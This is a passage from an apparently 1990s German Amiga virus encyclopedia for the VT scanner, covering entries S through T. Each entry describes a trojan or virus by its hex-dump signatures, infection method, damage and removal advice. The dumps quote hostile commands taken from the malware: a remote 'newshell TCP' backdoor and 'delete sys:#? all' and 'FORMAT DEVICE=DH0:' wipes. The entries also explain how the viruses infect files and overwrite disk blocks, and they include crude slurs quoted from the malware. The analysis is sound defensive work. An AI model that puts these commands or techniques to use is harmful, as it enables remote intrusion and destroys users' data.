  5667.                             536e6f6f 70446f73         SnoopDos
  5668.           20537570 706f7274 2050726f 63657373  Support Process
  5669.           00433a4d 6f756e74 0072756e 203e4e49 .C:Mount.run >NI
  5670.           4c3a206e 65777368 656c6c20 54435000 L: newshell TCP.
  5671.           32353531 00005354 44207072 6573656e 2551..STD presen
  5672.           7473202d 20566167 696e6974 69732023 ts - Vaginitis #
  5673.           32202d2d 2066696c 74687920 77686f72 2 -- filthy whor
  5674.           6521                                e!
  5675.       Speicherverankerung:
  5676.            - FindTask veraendert - Ende
  5677.            - Examine veraendert - Ende
  5678.            - SnoopDos im Speicher - CCR wird veraendert
  5679.            - Loadseg wird verbogen
  5680.       Linkvorgang:
  5681.            - hinter den 1. Hunk von mount
  5682.            - Codierung mit EOR
  5683.            - Findtask nicht veraendert
  5684.            - Examine nicht veraendert
  5685.            - Suche nach RTS nur im letzten Langwort des 1.Hunks und
  5686.              Ersetzen durch NOP (dadurch kein "100% richtiger" Aus-
  5687.              bau moeglich vgl. auch Fungus)
  5688.            - FileDate zurueckschreiben
  5689.       Schaden:
  5690.            - Suche TCP in DosList
  5691.            - Setze hinter TCP (s.o.) einen Doppelpunkt
  5692.            - DosExecute run >NIL: .....
  5693.            - Es soll also wahrscheinlich ein Fremdzugriff auf den
  5694.              Rechner ermoeglicht werden
  5695.       Vgl. auch alle anderen STD-Varianten und Fungus
  5696.       Zum Nachdenken: eine neuere Trojanvariante (3) haengt an einer
  5697.          aelteren Libversion (0.27) und umgekehrt ????
  5698.              
  5699.    - STD-Vag3-Trojan
  5700.       Filename:  rexxkuang11.library 0.27 L: #26532 Bytes  
  5701.       Nicht Resetfest
  5702.       Ab KS2.04
  5703.       Verbogene Vektoren: KEINE
  5704.       Vermehrung: Nein  
  5705.       Decodiert mit EOR ist im Trojanteil zu lesen:
  5706.                    52554e20 3e4e494c 3a206e65     RUN >NIL: ne
  5707.           77736865 6c6c2074 63703a32 33333300 wshell tcp:2333.
  5708.              ;...
  5709.                             53544420 70726573         STD pres
  5710.           656e7473 20566167 696e6974 69732023 ents Vaginitis #
  5711.           33202d2d 2d206469 6420796f 75206669 3 --- did you fi
  5712.           6e642031 20616e64 20322079 65743f00 nd 1 and 2 yet?.
  5713.       Springt im File mit BRA in das Trojanteil 
  5714.       Schaden:
  5715.            - Holt sich die DosBase wahrscheinlich aus einer Lib
  5716.            - Suche TCP in DosList falls nein Ende
  5717.            - DosExecute run >NIL: .....
  5718.            - Es soll also wahrscheinlich ein Fremdzugriff auf den
  5719.              Rechner ermoeglicht werden
  5720.       Loeschen Sie bitte die Lib
  5721.       Vgl. auch alle anderen STD-Varianten
  5722.       Zum Nachdenken: eine neuere Trojanvariante (3) haengt an einer
  5723.          aelteren Libversion (0.27) und umgekehrt ????
  5724.  
  5725.  
  5726.    - Stockmarket-BBS   Filename: stock.rexx   Laenge: 74576 Bytes
  5727.          Nach meiner Meinung fuer Nicht-Mailbox-Spieler ungefaehrlich.
  5728.          VT bietet nur loeschen an.
  5729.          Schaeden: Kann ich nicht nachvollziehen. Deshalb ein Textauszug
  5730.          OHNE Garantie:
  5731.    -----------------------------------------------------------------------
  5732.    WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
  5733.    -----------------------------------------------------------------------
  5734.  I Just wanna inform all of you /X sysops, than a file -L-STOCK.LHA (a door
  5735.  game for /X) has a fucking BACKDOOR !!!!
  5736.  If you enter BUY option and write a number highest than possible (for
  5737.  example a number 20 or 100 or any more than allowed than your Upload Status
  5738.  will be restored to 0 !!!!! 0 bytes !!!!! All your uploads will be canceled!
  5739.  
  5740.  
  5741.    - Strange Atmosphere  Installer
  5742.         Bekannte Filenamen:
  5743.         Typ A :             db 3.03   Laenge: 76676 Bytes
  5744.         Im File ist zu lesen:
  5745.            00006462 2076332e 303320a9 31393936 ..db v3.03 .1996
  5746.            20446176 69642045 6b686f6c 6d2c2044  David Ekholm, D
  5747.         Ich gehe davon aus, dass es diese Version 3.03 im Original
  5748.         nicht gibt.
  5749.         Typ B :             IconX     Laenge:  6288 Bytes
  5750.         Im File ist zu lesen:
  5751.            4e750024 5645523a 2069636f 6e782033 Nu.$VER: iconx 3
  5752.            392e3820 2832302e 312e3932 2900646f 9.8 (20.1.92).do
  5753.         Ich gehe davon aus, dass es diese Version 39.8 im Original
  5754.         nicht gibt.
  5755.         VT bietet Loeschen an.
  5756.         Ablauf:
  5757.         Suche nach SnoopDos. (Taskname wird erst im Code zusammenge-
  5758.         setzt) . Falls gefunden ->Ende.
  5759.         Schreibe C:Assign   Laenge: 4488 Bytes
  5760.         Im File ist zu lesen:
  5761.            45532f53 00245645 523a2061 73736967 ES/S.$VER: assig
  5762.            6e203337 2e352028 32302e35 2e393229 n 37.5 (20.5.92)
  5763.         Diese Versionsnummer kenne ich nicht. Sie sollten dieses
  5764.         assign-File loeschen und ein Original neu aufspielen.
  5765.         Da assign fast in jeder startup-sequence vorkommt, wird das
  5766.         Teil nach jedem Reset gestartet.
  5767.         VT bietet loeschen an.
  5768.         Typ C :             assign    Laenge:  4488 Bytes
  5769.  
  5770.    - Strange Atmosphere   Linkvirus
  5771.         Ab KS 2.04  (Test auf $25)
  5772.         Verbogener Vektor: LoadSeg
  5773.         Nicht resetfest
  5774.         Fileverlaengerung hinter den 1.Hunk: 1232 Bytes
  5775.         Ueberlaeuft 3E8, 3F0, 3F1-Hunks.
  5776.         Decodiert ist im Linkteil zu lesen:
  5777.            2d2b2a20 53747261 6e676520 41746d6f -+* Strange Atmo
  5778.            73706865 7265205b 674f4f64 5d202a2b sphere [gOOd] *+
  5779.         gOOd kann im Programm durch eViL ersetzt werden.
  5780.         VT versucht den Ausbau.
  5781.         Ablauf:
  5782.         Test auf Medium ok
  5783.         4 Block frei
  5784.         File ausfuehrbar (3F3)
  5785.         3E9-Hunk wird gefunden.
  5786.         Erste Hunklaenge stimmt mit $14-Fileeintrag ueberein.
  5787.         File groesser als #2600 Bytes.
  5788.         File kleiner (In Abhaengigkeit von Speichermediumgroesse)
  5789.         als #30000 Bytes oder #290000 Bytes.
  5790.         File beginnt nicht mit "v" oder "V".
  5791.         Der zweite Test auf ".l" im Filenamen (library) funktioniert
  5792.         bei meinen Tests nicht. Das Library-Verzeichnis wurde ver-
  5793.         seucht (mit Proz.68030) .
  5794.         Test auf File noch nicht befallen.
  5795.         Verseuchung:
  5796.         Das Teil linkt sich hinter den ersten Hunk.
  5797.         Es wird nach $4EAE (jsr -xyz(a6) gesucht. Dies darf nicht mehr
  5798.         als $7FF0 vom Hunkende entfernt sein. Wird ersetzt durch
  5799.         $4EBAabcd (jsr Virusbeginn).
  5800.         Schaeden in Abhaengigkeit von $DFF006 und/oder einer Zaehlzelle:
  5801.         - Linkversuch siehe oben
  5802.         - Das File wird auf #10 Bytes gekuerzt und mit Muell gefuellt.
  5803.           Da ist NICHTS mehr zu retten.
  5804.         - In das File sollen ENDLOS immer wieder #10 Bytes geschrieben
  5805.           werden. Da ist nichts mehr zu retten.
  5806.         - Cool-Vektor wird verbogen, ein Reset ausgefuehrt UND DoIo-Vektor
  5807.           verbogen. Das trackdisk.device wird NICHT gefordert. Es sollen
  5808.           in einer ENDLOS-Schleife immer wieder #1024 Bytes Muell Beginn
  5809.           mit Block 0 (BB ODER RIGID !!!!!) geschrieben werden. Aber Sie
  5810.           haben doch bestimmt Zylinder 0 Ihrer Festplatte auf Diskette
  5811.           gesichert. Und ein verbogener DoIo-Vektor mahnt Sie sicherlich
  5812.           auch zur Vorsicht. Das kennen Sie ja von "alten" BB-Viren.
  5813.         - "Nach einem Warmstart hatte ich eine erschreckende Schwarz-Rot-
  5814.           Goldene Fahne auf meinem Monitor." (Hinweis von M. R. Danke!!!)
  5815.           Stimmt. Diese Routine ist im Linkteil vorhanden, wurde aber bei
  5816.           meinen Tests nicht ausgeloest, da die Bedingungen (s.o) zufaellig
  5817.           nie gestimmt haben.
  5818.         Allgemeine Hinweise: (fuer SEHR STARKE Verseuchung)
  5819.         Ueberlegen Sie bitte, ob es nicht sinnvoller ist, einzelne Unter-
  5820.         verzeichnisse ( z.B. c ) voellig neu auf die Festplatte aufzu-
  5821.         spielen.
  5822.         Falls Sie unbedingt eine Rettung durchfuehren muessen, dann gehen
  5823.         Sie bitte mit VT-Filerequester in die einzelnen Unterverzeichnisse
  5824.         Ihrer Festplatte. VT bewegt sich dann nur in dem gewaehlten Unter-
  5825.         verzeichnis und arbeitet schneller. Sp->File->SP und dann Unterver-
  5826.         zeichnis waehlen. Danach DirFTest.
  5827.  
  5828.  
  5829.    - Suntronic       Cool, DoIo, nur Kick1.2 da absolute ROM-Einspruenge
  5830.                      Vermehrung ueber BB   , immer $7FA00
  5831.                      Suntronic-Text im BB sichtbar
  5832.  
  5833.    - SuperBoy     Cool, im Prg DoIo, im Speicher immer ab $7EC00
  5834.          Vermehrung ueber BB
  5835.          Alertmeldung mit  .... The Famous SuperBoy
  5836.  
  5837.  
  5838.    - Surprise-Trojan   Zerstoerungsfile  Laenge ungepackt: 39296 Bytes
  5839.        Name uebernommen. Soll sich nach Fremdaussagen auf eine Party
  5840.        beziehen, auf der das Teil das erste Mal aufgetaucht ist.
  5841.        SOFORT loeschen
  5842.        Keine verbogenen Vektoren
  5843.        Verwendet Exec-Sprungbefehle, die erst ab KS2.04 existieren.
  5844.        Das File besteht aus der Zerstoerungsroutine und um eine File-
  5845.        laenge zu erreichen, die ein Demo glaubhaft macht aus 98%
  5846.        wwwww-Muell.  s.u.
  5847.        Schaden:
  5848.        Sucht nach scsi.device Unit 0 UND 1.
  5849.        Falls gefunden, werden $800 (= 4 Block) in den Rigid-Bereich
  5850.        geschrieben. Sie sollten in diesem Fall ein Backup des Rigid-
  5851.        bereichs ihrer Festplatte haben.
  5852.        Im File und spaeter im Rigid-Bereich ist zu lesen:
  5853.           fd6c4e75 5244534b 00000040 c9699f9f .lNuRDSK...@.i..
  5854.            ;.....                                 ^^^^ Rigid-Beginn
  5855.           00000000 5375636b 204d6520 4f726761 ....Suck Me Orga
  5856.           6e697a65 72732020 20202020 20202020 nizers
  5857.            ;.....
  5858.           00000000 50415254 00000040 b3d956c7 ....PART...@..V.
  5859.           00000007 ffffffff 00000001 00000000 ................
  5860.           00000000 00000000 07467563 6b4f6666 .........FuckOff
  5861.           45000000 00000000 00000000 00000000 E...............
  5862.            ;.....
  5863.           00000000 73637369 2e646576 69636500 ....scsi.device.
  5864.           77777777 77777777 77777777 77777777 wwwwwwwwwwwwwwww
  5865.  
  5866.  
  5867.    - SWiFTER-Trojan  File Zerstoerung
  5868.        Laenge gepackt:  106496
  5869.        Laenge entpackt: 215448
  5870.        Keine verbogenen Vektoren
  5871.        Keine Vermehrung
  5872.        VT bietet Loeschen an
  5873.        Nach FileID: ein Spiel
  5874.        In Wirklichkeit:
  5875.         Vor ein IFF-Bild wurden einige Dos-Routinen gesetzt. Diese
  5876.         Dos-Routinen haben Zerstoerungsfunktionen.
  5877.        Im entpackten File ist zu lesen:
  5878.                             733a7374 61727475         s:startu
  5879.           702d7365 7175656e 63650063 3a646972 p-sequence.c:dir
  5880.           00633a63 6f707900 633a6564 00633a64 .c:copy.c:ed.c:d
  5881.           656c6574 6500636f 70792030 30332e64 elete.copy 003.d
  5882.           61742073 3a007265 6e616d65 20733a30 at s:.rename s:0
  5883.           30332e64 61742073 3a737461 72747570 03.dat s:startup
  5884.           2d736571 75656e63 65003030 312e6461 -sequence.001.da
  5885.           74204b45 594d4150 533a2022 22003030 t KEYMAPS: "".00
  5886.           322e6461 74203030 302e6461 7400464f 2.dat 000.dat.FO
  5887.        Es wird also eine neue startup-s. geschrieben, die eine Delete-
  5888.        Funktion enthaelt (wirksam erst nach Reset) L: 73 Bytes:
  5889.           64656c65 74652073 79733a23 3f20616c delete sys:#? al
  5890.           6c0a3b20 7a786a62 676d6d6b 65757775 l.; zxjbgmmkeuwu
  5891.           39333233 2c746e63 48414841 21204841 9323,tncHAHA! HA
  5892.           48412179 62657476 63686564 74697469 HA!ybetvchedtiti
  5893.           79726367 64220a0a 0a00              yrcgd"....
  5894.        Aber!!! Es wird auch eine neue keymap aktiviert, deren Tastatur-
  5895.        belegung gefaehrliche Sequenzen enthaelt L: 1972 Bytes:
  5896.           5a020402 1a080122 01230124 4b455942 Z......".#.$KEYB
  5897.           204b494c 4c45523a 204b4152 4c204552  KILLER: KARL ER
  5898.               ;.....
  5899.           1d040521 464f524d 41542044 45564943 ...!FORMAT DEVIC
  5900.           453d4448 303a204e 414d453d 31205120 E=DH0: NAME=1 Q
  5901.        Loeschen Sie bitte ALLE Teile.
  5902.  
  5903.  
  5904.    - SwiftWare   siehe bei: Devil_V8_B.Door
  5905.          im File ist zu lesen:
  5906.            4E5D4E75 0C092020 53776966 74576172 N]Nu..  SwiftWar
  5907.            65207625 642E2564 202D2000 1B5B313B e v%d.%d - ..[1;
  5908.            25646D00 00427920 4A616262 61682026 %dm..By Jabbah &
  5909.            20504F57 001B5B25 646D0000 202D2054  POW..[%dm.. - T
  5910.            6F702055 706C6F61 64657220 5574696C op Uploader Util
  5911.  
  5912.    - Switch-Off    anderer Name: Joshua 2 s.o.
  5913.  
  5914.    - Suicide-Virus   BB   immer ab $7E120, Kicktag, KickChecksum,
  5915.        Supervisor , KS2.04: GURU
  5916.        Fordert trackdisk.device NICHT .
  5917.        Kodiert mit Byte aus $DFF006   eor.b d1,(a0)+  jeden BB fuer
  5918.        Vermehrung neu.
  5919.        Meldet sich nicht .
  5920.        Schaeden und Vermehrung: BB
  5921.        Namensbegruendung:  dekodiert ist im Speicher zu lesen:
  5922.            3e3e2053 75696369 6465204d 61636869 >> Suicide Machi
  5923.            6e652062 79204d41 5820696e 2032342e ne by MAX in 24.
  5924.            30392e31 39393220 3c3c0000 2c790000 09.1992 <<..,y..
  5925.  
  5926.    - SUMPF.Prg (L)  File  Laenge: 952 Bytes
  5927.        Wird als Scherz-Programm weitergegeben. Als ob es nicht genug
  5928.        Aerger mit den Viren gaebe. Wird von VT erkannt und Loeschen
  5929.        Sie bitte das Teil sofort. Bitte schauen Sie auch die startup-
  5930.        sequence an. Von der Definition natuerlich kein Virus, da keine
  5931.        Vermehrung. Verbiegt $6c und zurueck. Der Originalwert von $6c
  5932.        kann von dem Programm bei Prozessoren, die mit VecPage arbeiten,
  5933.        NICHT zurueckgesetzt werden. A4000/40: Programm laeuft
  5934.        Es wird mit DisplayAlert ein Text ausgegeben:
  5935.      Warnung !! Zuviele Befehle in den Menüs! Arbeitet da ein Hard-Virus ?!
  5936.                      usw. ersparen Sie mir den Rest.
  5937.  
  5938.    - SuperNovaKiller-Virus   File  siehe bei PHANTOM-Inst.
  5939.  
  5940.    - Sysinfo  Trojan      Zerstoerung ???????
  5941.        Filename: Sysinfo_V2.2
  5942.        Laenge gepackt:  3928 Bytes
  5943.        Laenge entpackt: 5656 Bytes
  5944.        KEIN verbogener Vektor
  5945.        KEINE Vermehrung
  5946.        Soll BBS loeschen siehe unten
  5947.        Vorsicht !!!!!
  5948.        Ich kenne ein SysInfo_V1.1 das sich nur in einigen Bytes unter-
  5949.        scheidet und den Zerstoerungsstring NICHT enthaelt !!!!
  5950.        Es besteht die Gefahr, dass es zu FEHLERKENNUNGEN kommt !!!
  5951.        Die Zerstoerungs-Funktion konnte ich bei Tests auf keinem Amiga-Typ,
  5952.        mit dem ich testen kann, ausloesen. Warum VT das GEPACKTE Teil
  5953.        dennoch erkennt ??? Damit die Erbsenzaehler ruhiger schlafen
  5954.        koennen.
  5955.            Sysinfo_v1.1 Orig.           Sysinfo_v2.2  Fake
  5956.            793f0000 0d0a5379 y?....Sy : 793f0000 0d0a5379 y?....Sy
  5957.            7374656d 496e666f stemInfo : 7374656d 496e666f stemInfo
  5958.            2056312e 310d0a00  V1.1... : 2056322e 320d0a00  V2.2...
  5959.            ;......
  5960.            3a320000 64656c65 :2..dele : 3a320000 64656c65 :2..dele
  5961.            74652054 3a330000 te T:3.. : 74652042 42533a23 te BBS:#
  5962.            64656c65 74652054 delete T : 3f20616c 6c202054 ? all  T
  5963.            3a340000 000003f2 :4...... : 3a340000 000003f2 :4......
  5964.  
  5965.    - SystemScan-Trojan  Zerstoerungsfile
  5966.        Eine Zuordnung zu COP-Varianten ist NICHT nachvollziehbar.
  5967.        Filename: scansystem
  5968.        Laenge ungepackt: 10720 Bytes
  5969.        Keine verbogenen Vektoren
  5970.        Keine Vermehrung
  5971.        Nicht resetfest
  5972.        Im File ist zu lesen:
  5973.           20537973 74656d53 63616e20 76302e36  SystemScan v0.6
  5974.           20627920 43686563 6b496e20 2120696e  by CheckIn ! in
  5975.           20313939 35007700 20537973 74656d53  1995.w. SystemS
  5976.             ;.....
  5977.           63616e20 53797374 656d204c 69627261 can System Libra
  5978.           72696573 20210a00 5359533a 4c696273 ries !..SYS:Libs
  5979.             ;.....
  5980.           5359533a 4655434b 21007700 2043616e SYS:FUCK!.w. Can
  5981.        Ueber Cli-Ausgabe wird ein Test vorgetaeuscht. In Wirklichkeit
  5982.        werden in c, devs, l, libs und s alle Files geloescht. Um eine
  5983.        Undelete-Funktion zu verhindern, wird ein File FUCK! (teil-
  5984.        weise sehr gross) geschrieben, das den urspruenglichen Inhalt
  5985.        der geloeschten Files ueberschreiben soll. Dieses File ent-
  5986.        haelt in Wiederholungen den sichtbaren Text von systemscan.
  5987.        Leider keine Rettung moeglich.
  5988.        VT bietet nur loeschen an.
  5989.  
  5990.  
  5991.    - T.ET.E   BB Virus   anderer Name:BB-Prot     Zombi 1 Clone  s.u.
  5992.        Unterschied zu Zombi:
  5993.        versucht beim Booten durch die XCopy-Meldung
  5994.            NO VIRUS ON BOOTBLOCK   zu taeuschen.
  5995.        Die codierte Zombi-Meldung (intuition) wurde ueberschrieben.
  5996.        Schreibt in den zerstoerten  Rootblock als Diskname:
  5997.         01b0: 07542e45 542e4520 00000000 00000000 .T.ET.E ........
  5998.        Im Virus-BB ist zu lesen:
  5999.            4ef90007 a0363e42 422d5072 6f742062 N....6>BB-Prot b
  6000.            79205420 4520696e 20313200 30360031 y T E in 12.06.1
  6001.            3939353c 0007ee00 0007ee50 2001fffe 995<.......P ...
  6002.        Da beim Neuschreiben des RootBlocks, die ZOMBI-CheckSum (= falsch
  6003.        fuer T.ET.E) verwendet wird, duerfte wieder einmal ein An-
  6004.        faenger am Werk gewesen sein. 
  6005.  
  6006.    - TFC Evergreen 47.11  BB   Clone  s.u.
  6007.           Text geaendert.
  6008.            7069643a 000100cb 40544643 20457665 pid:....@TFC Eve
  6009.            72677265 656e2020 56697275 73203437 rgreen  Virus 47
  6010.            2e313100 01005070 49742069 73206120 .11...PpIt is a
  6011.             ;....                  
  6012.            20202020 20202020 00010020 e828312e         ... .(1.
  6013.            2031302e 20313939 33292020 20202020  10. 1993)
  6014.  
  6015.  
  6016.    - T.F.C. Revenge V1.03  Clone Extreme s.o.
  6017.           Text geaendert und Text im BB verschoben  
  6018.            000100cb 40542e46 2e432e20 52657665 ....@T.F.C. Reve
  6019.            6e676520 56697275 73205631 2e303300 nge Virus V1.03.
  6020.             ;....
  6021.            7265772c 2030362e 30362e31 39393120 rew, 06.06.1991
  6022.  
  6023.    - T.F.C. Revenge V2.14
  6024.           Versionsnummer und Datum geaendert, Rest s.o.    
  6025.            000100cb 40542e46 2e432e20 52657665 ....@T.F.C. Reve
  6026.            6e676520 56697275 73205632 2e313400 nge Virus V2.14.
  6027.             ;....
  6028.            7265772c 2032372e 30382e31 39393120 rew, 27.08.1991
  6029.  
  6030.    - T.F.C. Revenge LoadWB     File, Laenge ungepackt: 2804 Bytes
  6031.       Fuehrt LoadWB-Befehl aus und legt T.F.C. Revenge BB im Speicher
  6032.       ab. Verbogene Vektoren siehe bei Extreme.
  6033.       Vermehrung nur als Bootblock moeglich.
  6034.  
  6035.    - TAI-Virus   BB  anderer Name: SCA-TAI-Virus  s.o.
  6036.  
  6037.    - TAI2-Virus  BB  anderer Name: MAD2-TAI2-Virus s.o.
  6038.  
  6039.    - TAI3-FORPIB-Virus  BB  s.o.
  6040.       Text geaendert
  6041.            444f5300 b8e19b72 54414933 6000003e DOS....rTAI3`..>
  6042.            54686973 20697320 6120426f 6f746c61 This is a Bootla
  6043.            64657220 616e6420 416e7469 76697275 der and Antiviru
  6044.            73212044 6f6e7420 6b696c6c 20697420 s! Dont kill it
  6045.            5654322e 36303a00 00000253 48e77f7f VT2.60:....SH.
  6046.       Hinweis 28.10.93:
  6047.            - Zu diesem Zeitpunkt ist VT2.57 aktuell
  6048.            - Ich habe fuer VT noch NIE (und habe es auch nicht vor!!!!),
  6049.              einen speziellen BB programmiert. Lassen Sie sich also
  6050.              bitte nicht verwirren. Danke
  6051.  
  6052.    - TAI4-TimeBomb.V  BB   TimeBomb V1.0-Clone s.u.
  6053.            14202048 61766520 61206e69 63652064 .  Have a nice d
  6054.            61792020 536f7272 7920204c 6f6f6b20 ay  Sorry  Look
  6055.            666f7220 542e412e 492e2020 74686520 for T.A.I.  the
  6056.            62657374 2e2e0001 00000000 42b90007 best........B...
  6057.  
  6058.    - TAI5-BB  s.o. DUMDUM-Clone
  6059.  
  6060.    - TAI6 BB und File s.o CCCP-Clone
  6061.  
  6062.    - TAI7 BB  s.o LAMER1-Clone
  6063.       Das Teil wird von VT als BB nur als LAMER erkannt, da nicht einmal
  6064.       der Zerstoerungstext LAMER geaendert wurde.
  6065.  
  6066.    - TAI7-Inst.   Laenge gepackt: 2936 Bytes  Laenge entpackt: 4176 Bytes
  6067.       Namensbegruendung: s.u.
  6068.       An loadwb wurde mit Hunklab ein BootJob-File gehaengt.
  6069.       In diesem BootJob-File wurde der Programmierername geaendert und
  6070.       es enthaelt einen LAMER1-BB oder einen anderen Virus.BB
  6071.       Lesbarer Text:
  6072.            2e2e2ea7 2e3a2825 26372954 2e412e49 .....:(%&7)T.A.I
  6073.            2e30372e 3a2c2e2e 2e2e2039 2e2ea724 .07.:,.... 9...$
  6074.            32727472 61636b64 69736b2e 64657669 2rtrackdisk.devi
  6075.       Gepackt sollte VT loeschen anbieten.
  6076.       Entpackt sollte VT Ausbau anbieten.
  6077.       Vorsicht: Im gepackten Zustand koennte VT das File verwechseln.
  6078.       Entpacken Sie das File dann erst zur Sicherheit mit einem ge-
  6079.       eigneten Entpacker. Danke
  6080.  
  6081.    - TAI8 BB   s.o. 16BIT-Crew Clone
  6082.  
  6083.    - TAI9 BB   s.o. DAT 89 Clone
  6084.  
  6085.    - TAI10-Inst.  BB-Installer   Laenge Virusteil: 1336 Bytes
  6086.       Im Virusteil ist zu lesen:
  6087.            2eff2127 54414920 3130002d 1c535553 ..!'TAI 10.-.SUS
  6088.       Verwendet absolute Speicheradressen, die nicht in jedem Amiga
  6089.       vorhanden sind. Ich habe auf JEDER Maschine, auf der ich das Teil
  6090.       ausprobieren konnte, nur den GURU gesehen. Falls jemand mehr
  6091.       "Glueck" hat, bitte ich um eine Nachricht. Danke
  6092.       Am File sollte das Teil erkannt werden und VT sollte Ausbau an-
  6093.       bieten. Das Teil soll einen TAI10-CLONK.BB installieren (s.u.) .
  6094.  
  6095.       Hinweis 21.01.94: Es ist ein aehnlicher Link an ein File aufge-
  6096.       taucht. Soll VirusSlayer installieren. Wird ebenfalls als TAI10-
  6097.       Inst. erkannt. Da die Routine gleich ist, koennte ein Programm,
  6098.       das diese Arbeit macht, existieren ??????
  6099.  
  6100.    - TAI10-CLONK-Virus  BB   CLONK-Virus s.u.
  6101.       Nur Text geaendert:
  6102.            20746f20 6b696c6c 20626f6f 74766972  to kill bootvir
  6103.            75732e2e 2eff2127 54414920 3130002d us....!'TAI 10.-
  6104.            1c535553 50494349 4f555320 424f4f54 .SUSPICIOUS BOOT
  6105.            424c4f43 4b20464f 554e442e 2e2e00c0 BLOCK FOUND.....
  6106.  
  6107.    - TAI11 Compu3-Clone   File  Laenge 592  Rest s.o. CompuPhagozyte 3
  6108.       Namensbegruendung:
  6109.            20542041 20492020 31312020 202e2e2e  T A I  11   ...
  6110.  
  6111.    - TAI13-BB  4 Bloecke  Glasnost-Clone  s.o.
  6112.       Wird von VT beim BB-Test als Glasnost erkannt.
  6113.       In Block 4 ist uncodiert zu lesen:
  6114.            646f732e 6c696272 61727900 20542e41 dos.library. T.A
  6115.            2e492e31 333c0000 002e5380 43ec000c .I.13<....S.C...
  6116.  
  6117.    - Taipan-Chaos    anderer Name: Chaos  s.o.
  6118.       siehe auch: Chaos, Taipan-Lameblame, CHEATER HIJACKER, POLISH,
  6119.  
  6120.    - Taipan-LameBlame  anderer Name: LameBlame  s.o.
  6121.       siehe auch: Chaos, Taipan-Chaos, CHEATER HIJACKER, POLISH,
  6122.  
  6123.    - Target   cool,  im Prg. DoIo , immer $7ec00
  6124.       schreibt auf jede nicht schreibgeschuetzte Disk, die in Block
  6125.       880 ab $1b0/1 (=Diskname)  eine bestimmte Zeichenfolge
  6126.       enthaelt, ab Track 80 bis Ende (mal was Neues) sinnlose Daten
  6127.       Ursprungsprogramm:target.install (Malta)
  6128.  
  6129.    - tdtj-Trojan   Zerstoerungsfile
  6130.          Bekannte Filenamen:  BlueSky1.exe         40796 Bytes
  6131.                               FAIRLIGHT-1996.exe   40796 Bytes
  6132.                               lha20reg.exe         36088 Bytes
  6133.               Wobei BlueSky und Fairlight nur andere Namen fuer das
  6134.               GLEICHE File sind.
  6135.          Keine verbogenen Vektoren
  6136.          Nicht resetfest
  6137.          Im File ist zu lesen:
  6138.            00000000 00007464 746a2f65 66776a64 ......tdtj/efwjd
  6139.            6600                                f.
  6140.          Wenn Sie mit -1 arbeiten, ergibt sich scsi.device .
  6141.          Schaden:
  6142.          Versucht scsi.device Unit 0 zu oeffnen und ab Block 0 jeden
  6143.          Block in einer Schleife zu ueberschreiben.
  6144.          Das MUSS auffallen !!!
  6145.  
  6146.    - TeleCom-Virus   File   Laenge: 756 Bytes
  6147.       Cool immer $C71082, im Programm noch DoIo und FindRes .
  6148.       Braucht Execbase im Speicher ab $C00000 .
  6149.       Nur mit KS1.3, da absolute ROM-Einspruenge .
  6150.       Namensbegruendung:
  6151.       Decodiert mit eori.b #$27,(a1)+ ist im Speicher zu lesen:
  6152.            732f7374 61727475 702d7365 7175656e s/startup-sequen
  6153.            63650000 2054656c 65436f6d 20d80000 ce.. TeleCom ...
  6154.       Vermehrung:
  6155.        -Schreibt in startup-sequence 1.Zeile $A00A . Also den
  6156.         nichtsichtbaren Filenamen $A0 und ein Return.
  6157.        -Kopiert sich selbst ins Root-Verzeichnis mit Filename $A0.
  6158.       Einfach loeschen und in startup-sequence mit einem Editor
  6159.       die 1.Zeile loeschen.
  6160.       Hinweis: Der unsichtbare Filename $A0 wird auch von BGS9-3
  6161.       fuer das verschobene Originalprogramm verwendet. Es koennte
  6162.       also zu Verwechslungen kommen.
  6163.  
  6164.    - Telstar   Cold, Cool, Zaehlzelle $C0
  6165.      ganz gemein, taeuscht durch Text Virusprotector 6.0 vor, entschluesselt
  6166.          (neg.b) BBteile nach $7fc00, jeder 4/2.Reset Graphikausgabe (holl.
  6167.          Flagge und Text u.a. Telstar), keine Vermehrungsroutine gefunden.
  6168.  
  6169.    - Termigator: Kick 1.2 (da absolute ROM-Einspruenge)
  6170.          immer $7f4d0, Cool und DoIo
  6171.          entschluesselte Alertmeldung:
  6172.          Only the TERMIGATOR'VIRUS makes it possible! Bye!...
  6173.          Vermehrung: ueber BB
  6174.  
  6175.    - Terrorists     PrgFileVirus  Laenge 1612 Bytes
  6176.          KickMem, KickTag, KickCheckSum
  6177.          Textausgabe mit GraphikRoutine
  6178.          nimmt Namen des 1.Files in der Startup an
  6179.          verschiebt OrigPrg ins Hauptverzeichnis
  6180.          (unsichtbar A0202020A02020A020A0A0)
  6181.          Vermehrung: jede nichtschreibgeschuetzte Disk mit Startup
  6182.          im PrgFile sichtbar: TTV1
  6183.          schwarzer Hintergrund, weisse Schrift, zeilenweise
  6184.  
  6185.                   THE NAMES HAVE BEEN CHANGED
  6186.                   TO PROTECT THE INNOCENT...
  6187.                   THE TERRORISTS HAVE YOU UNDER CONTROL
  6188.                   EVERYTHING IS DESTROYED
  6189.                   YOUR SYSTEM IS INFECTED
  6190.                   THERE IS NO HOPE FOR BETTER TIMES
  6191.                   THE FIRST TERRORISTS VIRUS !!!
  6192.          Hinweis: es wird ein unsichtbares File (Name s.o.) weiterge-
  6193.             geben mit der Laenge #64 und dem Inhalt "Protection file!".
  6194.             Dieses File soll einen Terrorists-Befall der Disk verhindern.
  6195.          Clone: NoVi
  6196.  
  6197.    - TETRIS-COP-Trojan  Zerstoerung  Laenge: 21244 Bytes
  6198.          siehe bei COP-TypK-Trojan
  6199.  
  6200.    - Text-Hunk am Anfang
  6201.          Dieser Text-Hunk ist KEIN Virus !!!!!!!!!
  6202.          Aber die Filestruktur wird so veraendert, dass Link- und File-
  6203.          Viren nicht mehr gefunden werden koennen. Negativbeispiel siehe
  6204.          unten. Ueber Dos.library-Funktionen erfolgt eine Textausgabe
  6205.          ins Cli .
  6206.          Beispiel:
  6207.               4cdf7fff 4ef90000 0000646f 732e6c69 L..N.....dos.li
  6208.               62726172 79000000 06550000 001d0000 brary....U......
  6209.               069e0c20 20202020 5f5f2020 20202020 ...     __
  6210.               20202020 5f5f2020 20202020 20205f5f     __        __
  6211.               20202020 20202020 20202020 20202020
  6212.               20205f20 5f5f5f20 20202020 20202020   _ ___
  6213.               20202020 20202020 202f5c0a 205f5f5f          /\. ___
  6214.               2f20205c 5f5f5f5f 5f5f5f5f 2f20205c /  \________/  \
  6215.          Diese Hunks scheinen fuer Boxenwerbung verwendet zu werden.
  6216.          Die Erzeugerprogramme sind mir unbekannt. Falls Sie mir helfen
